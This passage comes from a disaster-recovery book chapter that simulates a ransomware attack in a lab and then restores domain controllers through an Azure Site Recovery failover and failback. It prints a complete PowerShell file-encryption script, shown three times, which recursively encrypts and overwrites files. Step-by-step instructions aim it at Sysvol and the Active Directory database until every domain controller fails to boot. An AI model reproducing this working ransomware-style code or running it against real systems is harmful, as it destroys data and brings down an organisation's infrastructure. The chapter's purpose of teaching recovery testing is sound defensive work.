Add-Type -AssemblyName System.Windows.Forms $FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog [void]$FolderBrowser.ShowDialog() $FolderBrowser.SelectedPath #global variables $csv = "C:\windows\temp\drives.csv" #Define the cert to use for encryption #Create your own cert with this command; New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname ransomware.mmsmoa.local $Cert = $(Get-ChildItem Cert:\LocalMachine\My\60BD2E50C9EB3937CB3DA6FBF2C5ACC925F3C00A) $Cert #discover the other folders beneath the selectedpath $FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) -and ( $_.Name -like "*$fileName*") } | % {$_.FullName} -ErrorAction SilentlyContinue $FilestoEncrypt Function Encrypt-File { Param([Parameter(mandatory=$true)][System.IO.FileInfo]$FilesToEncrypt, [Parameter(mandatory=$true)][System.Security.Cryptography.X509Certificates.X509C ertificate2]$Cert) Try { [System.Reflection.Assembly]::LoadWithPartialName("System.Security.Cryptography" ) } Catch { Write-Error "Could not load required assembly."; Return } $AesProvider = New-Object System.Security.Cryptography.AesManaged $AesProvider.KeySize = 256 $AesProvider.BlockSize = 128 $AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC $KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeFormatter($Cert.PublicKey.Key) [Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType()) [Byte[]]$LenKey = $Null [Byte[]]$LenIV = $Null [Int]$LKey = $KeyEncrypted.Length $LenKey = [System.BitConverter]::GetBytes($LKey) [Int]$LIV = $AesProvider.IV.Length
164
Chapter 7 Recovering from Ransomware using Azure Site Recovery
$LenIV = [System.BitConverter]::GetBytes($LIV) $FileStreamWriter Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Name)", [System.IO.FileMode]::Create) } Catch { Write-Error "Unable to open output file for writing."; Return } $FileStreamWriter.Write($LenKey, 0, 4) $FileStreamWriter.Write($LenIV, 0, 4) $FileStreamWriter.Write($KeyEncrypted, 0, $LKey) $FileStreamWriter.Write($AesProvider.IV, 0, $LIV) $Transform = $AesProvider.CreateEncryptor() $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write) [Int]$Count = 0 [Int]$Offset = 0 [Int]$BlockSizeBytes = $AesProvider.BlockSize / 8 [Byte[]]$Data = New-Object Byte[] $BlockSizeBytes [Int]$BytesRead = 0 Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) } Catch { Write-Error "Unable to open input file for reading."; Return } Do { $Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes) $Offset += $Count $CryptoStream.Write($Data, 0, $Count) $BytesRead += $BlockSizeBytes } While ($Count -gt 0) $CryptoStream.FlushFinalBlock() $CryptoStream.Close() $FileStreamReader.Close() $FileStreamWriter.Close() copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force } #Encrypt each file foreach ($file in $FilesToEncrypt) { Write-Host "Encrypting $file" Encrypt-File $file $Cert -ErrorAction SilentlyContinue } Exit
Encrypting the Sysvol Folder
165
Chapter 7 Recovering from Ransomware using Azure Site Recovery
Instructions
Screenshot (if applicable)
1. Logon to DC01 as Administrator 2. Open PowerShell ISE and run as Administrator 3. Browse to C:\windows\Sysvol and click ok
Add-Type -AssemblyName System.Windows.Forms $FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog [void]$FolderBrowser.ShowDialog() $FolderBrowser.SelectedPath
4. Create a new Self Signed Certificate 5. Copy the thumbprint to the clipboard
New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname ransomware.mmsmoa.local
166
Chapter 7 Recovering from Ransomware using Azure Site Recovery
6. Run the following to put the Certificate into the $Cert Variable
$Cert = $(Get-ChildItem Cert:\LocalMachine\My\7BD220D0D93475829CD40B4C1A67C2C 89DA4DBCD) $Cert
7. Then Grab the files from the folder
$FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) } | % {$_.FullName} ErrorAction SilentlyContinue $FilestoEncrypt
8. Run the Encrypt-File Function
Function Encrypt-File { Param([Parameter(mandatory=$true)][System.IO.FileInfo ]$FilesToEncrypt, [Parameter(mandatory=$true)][System.Security.Cryptogr aphy.X509Certificates.X509Certificate2]$Cert) Try { [System.Reflection.Assembly]::LoadWithPartialName("Sy stem.Security.Cryptography") } Catch { Write-Error "Could not load required assembly."; Return } $AesProvider = New-Object System.Security.Cryptography.AesManaged $AesProvider.KeySize = 256 $AesProvider.BlockSize = 128 $AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC $KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeForma tter($Cert.PublicKey.Key) [Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType()) [Byte[]]$LenKey = $Null [Byte[]]$LenIV = $Null [Int]$LKey = $KeyEncrypted.Length $LenKey = [System.BitConverter]::GetBytes($LKey)
167
Chapter 7 Recovering from Ransomware using Azure Site Recovery
[Int]$LIV = $AesProvider.IV.Length $LenIV = [System.BitConverter]::GetBytes($LIV) $FileStreamWriter Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Nam e)", [System.IO.FileMode]::Create) } Catch { Write-Error "Unable to open output file for writing."; Return } $FileStreamWriter.Write($LenKey, 0, 4) $FileStreamWriter.Write($LenIV, 0, 4) $FileStreamWriter.Write($KeyEncrypted, 0, $LKey) $FileStreamWriter.Write($AesProvider.IV, 0, $LIV) $Transform = $AesProvider.CreateEncryptor() $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStream Writer, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Writ e) [Int]$Count = 0 [Int]$Offset = 0 [Int]$BlockSizeBytes = $AesProvider.BlockSize / 8 [Byte[]]$Data = New-Object Byte[] $BlockSizeBytes [Int]$BytesRead = 0 Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) } Catch { Write-Error "Unable to open input file for reading."; Return } Do { $Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes) $Offset += $Count $CryptoStream.Write($Data, 0, $Count) $BytesRead += $BlockSizeBytes } While ($Count -gt 0) $CryptoStream.FlushFinalBlock() $CryptoStream.Close() $FileStreamReader.Close() $FileStreamWriter.Close() copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force }
9. Try Encrypting your files
168
foreach ($file in $FilesToEncrypt) { Write-Host "Encrypting $file" Encrypt-File $file $Cert -ErrorAction SilentlyContinue
Chapter 7 Recovering from Ransomware using Azure Site Recovery
}
10. Verify that the files are indeed encrypted
11. Test GPUpdate from a client for interesting results. Here is before.
169
Chapter 7 Recovering from Ransomware using Azure Site Recovery
12. Here is after the Sysvol was Encrypted 13. We had a scenario like this at one client and didn’t have a good backup of the Domain Controller. We we able to use DCGPOFix.exe to overwrite the default domain and default domain controller policy to start over.
14. Next, we replicated Active Directory to push our encrypted files out to all domain controllers.
15. Verified on DC02 that the Sysvol was encrypted
170
Chapter 7 Recovering from Ransomware using Azure Site Recovery
Taking Down Production Killing Domain Controllers with Ransomware In this scenario, we are going to target the Active Directory Database files which are by default located in c:\Windows\NTDS. We will use the steps performed below to take down all of the Domain Controllers in our lab leaving us no choice but to restore from backup or failover to a DR site like Azure.
Encrypting the Active Directory Database Instructions
Screenshot (if applicable)
1. Logon to DC01 as Administrator 2. Open PowerShell ISE and run as Administrator 3. Browse to C:\windows\NTDS and click ok
Add-Type -AssemblyName System.Windows.Forms $FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog [void]$FolderBrowser.ShowDialog() $FolderBrowser.SelectedPath
171
Chapter 7 Recovering from Ransomware using Azure Site Recovery
4. Create a new Self Signed Certificate 5. Copy the thumbprint to the clipboard
New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname ransomware.mmsmoa.local
6. Run the following to put the Certificate into the $Cert Variable
$Cert = $(Get-ChildItem Cert:\LocalMachine\My\7BD220D0D93475829CD40B4C1A67C2C 89DA4DBCD) $Cert
7. Then Grab the files from the folder
$FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) } | % {$_.FullName} ErrorAction SilentlyContinue
172
Chapter 7 Recovering from Ransomware using Azure Site Recovery
$FilestoEncrypt
8. Run the Encrypt-File Function
Function Encrypt-File { Param([Parameter(mandatory=$true)][System.IO.FileInfo ]$FilesToEncrypt, [Parameter(mandatory=$true)][System.Security.Cryptogr aphy.X509Certificates.X509Certificate2]$Cert) Try { [System.Reflection.Assembly]::LoadWithPartialName("Sy stem.Security.Cryptography") } Catch { Write-Error "Could not load required assembly."; Return } $AesProvider = New-Object System.Security.Cryptography.AesManaged $AesProvider.KeySize = 256 $AesProvider.BlockSize = 128 $AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC $KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeForma tter($Cert.PublicKey.Key) [Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType()) [Byte[]]$LenKey = $Null [Byte[]]$LenIV = $Null [Int]$LKey = $KeyEncrypted.Length $LenKey = [System.BitConverter]::GetBytes($LKey) [Int]$LIV = $AesProvider.IV.Length $LenIV = [System.BitConverter]::GetBytes($LIV) $FileStreamWriter Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Nam e)", [System.IO.FileMode]::Create) } Catch { Write-Error "Unable to open output file for writing."; Return } $FileStreamWriter.Write($LenKey, 0, 4) $FileStreamWriter.Write($LenIV, 0, 4)
173
Chapter 7 Recovering from Ransomware using Azure Site Recovery
$FileStreamWriter.Write($KeyEncrypted, 0, $LKey) $FileStreamWriter.Write($AesProvider.IV, 0, $LIV) $Transform = $AesProvider.CreateEncryptor() $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStream Writer, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Writ e) [Int]$Count = 0 [Int]$Offset = 0 [Int]$BlockSizeBytes = $AesProvider.BlockSize / 8 [Byte[]]$Data = New-Object Byte[] $BlockSizeBytes [Int]$BytesRead = 0 Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) } Catch { Write-Error "Unable to open input file for reading."; Return } Do { $Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes) $Offset += $Count $CryptoStream.Write($Data, 0, $Count) $BytesRead += $BlockSizeBytes } While ($Count -gt 0) $CryptoStream.FlushFinalBlock() $CryptoStream.Close() $FileStreamReader.Close() $FileStreamWriter.Close() copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force }
9. Try Encrypting your files
174
foreach ($file in $FilesToEncrypt) { Write-Host "Encrypting $file" Encrypt-File $file $Cert -ErrorAction SilentlyContinue }
Chapter 7 Recovering from Ransomware using Azure Site Recovery
10. Let’s see if it worked. Try opening Active Directory users and computers. It appears to be still working.
11. Stop the Active Directory Domain Services Service
175
Chapter 7 Recovering from Ransomware using Azure Site Recovery
12. Try Encrypting the C:\Windows\NTDS folder again
13. Now try to restart the Active Directory Domain Services Service.
14. We can see that the service won’t start with a weird error 0xc0000001: 0xc0000001
15. We can see that Active Directory Users and computer is not operational
176
Chapter 7 Recovering from Ransomware using Azure Site Recovery
16. Repeat the steps on DC02
17. Both DC’s are dead we should try rebooting right. Sure why not.
18. We now have all of our DC’s in a non-bootable state with Blue Screens
19. The attack has succeeded, and all domain controllers are dead.
177
Chapter 7 Recovering from Ransomware using Azure Site Recovery
Survival Mode Recovering to Azure Remember we talked about a narrow window to recover to Azure. If you outrun your recovery points all of your data in the cloud will be encrypted as well. What is required at this point at a minimum is to plan to proceed and execute quickly with a cloud recovery strategy?
As you can see from the screenshot above that our replication is still running to Azure. Azure Site Recovery doesn’t understand that anything bad has happened. Soon enough all of our DC’s in our Recovery Vault will also have rolling blue screens. 178
Chapter 7 Recovering from Ransomware using Azure Site Recovery
Tick Tock time to make a decision – We are Recovering to Azure Ok, so the decision has been made we have been asked to proceed with Azure-based recovery. We had created a Recovery Plan in Azure Site Recovery, but Recovery Plans can only be used to Failover to the last Recovery Point. This will not work for us in this situation.
179
Chapter 7 Recovering from Ransomware using Azure Site Recovery
Performing the Double Swing Recovery The double swing migration method is extremely useful in situations like this. We will first fail the Virtual Machines over to our Azure Tenant. Validate that everything is ok and then bring them back on-prem to save the day.
Instructions
1. Logon to your Azure Tenant and browse to your recovery vault. 2. Click on replicated items 3. Click on DC01 and click Failover 4. After we have validated the Virtual Machines we need to Commit then to Azure
5. Now we will use a Planned Failover to move the Virtual machines back on-prem.
180
Screenshot (if applicable)
Chapter 7 Recovering from Ransomware using Azure Site Recovery
6. On the planned failover window validate the options and click ok.
181
Chapter 7 Recovering from Ransomware using Azure Site Recovery
7. Repeat the steps on DC02 and wait approximately 45 minutes. In the mean time, we will have a look at a few things.
8. You can see the status of the Planned Failover
9. Viewing the Job status in Hyper-V Manager
182
Chapter 7 Recovering from Ransomware using Azure Site Recovery
10. You can view the progress of the replication by checking cbengine.exe in Resource Monitor.
11. We can also enable debug logging to see what is happening.
logman create trace ASRDebug -v mmddhhmm -o C:\temp\asr.etl -cnf 01:00:00 -nb 10 250 -bs 16 -ow y logman update ASRDebug -p "Microsoft-Azure Site Recovery-Provider" 0x8000000000000000 0x5 logman update ASRDebug -p "MicrosoftAzureRecoveryServices" 0xC000000000000000 0x5 logman start ASRDebug logman stop ASRDebug netsh trace convert C:\temp\asr_04132122.etl
183
Chapter 7 Recovering from Ransomware using Azure Site Recovery
12. After a while, you can see the planned failover succeeded we have to hit Complete Failover
13. Hit Complete Failover
184
Chapter 7 Recovering from Ransomware using Azure Site Recovery
14. You can view the status of the replication in Hyper-V Manager
15. You can see the progress in Azure with the Failback
16. We can see the Domain Controllers back online now. 17. The real test is to see if Active Directory is working now.
185
Chapter 7 Recovering from Ransomware using Azure Site Recovery
18. We can also see that our Sysvol is now fixed.
186
Chapter 7 Recovering from Ransomware using Azure Site Recovery
187
Chapter 8 Disaster Recovery items left forgotten
Chapter 8
Disaster Recovery items left forgotten
188
Chapter 9 Join us at MVPDays and meet great MVP’s like this in person
Chapter 9
Join us at MVPDays and meet great MVP’s like this in person If you liked their book, you would love to hear them in person.
Live Presentations Dave frequently speaks at Microsoft conferences around North America, such as TechEd, VeeamOn, TechDays, and MVPDays Community Roadshow. Cristal runs the MVPDays Community Roadshow. You can find additional information on the following blog: www.checkyourlogs.net www.mvpdays.com
Video Training For video-based training, see the following site: www.mvpdays.com
189
Chapter 9 Join us at MVPDays and meet great MVP’s like this in person
Live Instructor-led Classes Dave has been a Microsoft Certified Trainer (MCT) for more than 15 years and presents scheduled instructor-led classes in the US and Canada. For current dates and locations, see the following sites:
www.truesec.com
www.checkyourlogs.net
Consulting Services Dave and Cristal have worked with some of the largest companies in the world and had a wealth of experience and expertise. Customer engagements are typically between two weeks and six months.
190
Chapter 9 Join us at MVPDays and meet great MVP’s like this in person
191